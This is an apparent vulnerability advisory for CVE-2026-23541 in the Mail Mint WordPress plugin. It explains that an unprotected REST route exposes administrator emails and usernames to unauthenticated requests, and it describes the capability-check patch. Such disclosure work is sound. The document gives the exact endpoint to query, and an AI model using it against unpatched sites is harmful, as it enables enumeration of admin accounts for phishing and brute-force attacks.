Atomic Edge analysis of CVE-2026-23541:
The Mail Mint WordPress plugin version 1.19.4 and earlier contains a missing authorization vulnerability in its REST API endpoint for retrieving administrator users. This flaw allows unauthenticated attackers to access sensitive administrative user data.

Atomic Edge research identifies the root cause in the `WPRoute.php` file. The plugin registers a REST route at `/wp-json/mailmint/v1/admins`. The route’s `permission_callback` is set to `’__return_true’` (line 149 in the diff), which grants access to any request regardless of authentication status. The callback function `get_admins` in the associated controller lacks any internal capability check.

An attacker can exploit this by sending a simple HTTP GET request to the vulnerable REST endpoint. The target URL is `/wp-json/mailmint/v1/admins`. No authentication headers, cookies, or specific parameters are required. The server responds with a JSON array containing administrator user details such as IDs, emails, and usernames.

The patch changes the `permission_callback` from `’__return_true’` to `PermissionManager::current_user_can( ‘manage_options’ )` in `WPRoute.php`. This ensures the WordPress capability check executes before the `get_admins` controller method. The fix restricts endpoint access to users with the `manage_options` capability, typically only administrators. The version number in `mail-mint.php` increments to 1.19.5, and other file changes reflect build updates.

Successful exploitation leads to unauthorized information disclosure. Attackers can enumerate all WordPress administrator accounts registered with the Mail Mint plugin. This data facilitates targeted phishing campaigns, password brute-force attacks, or further privilege escalation by identifying high-value targets.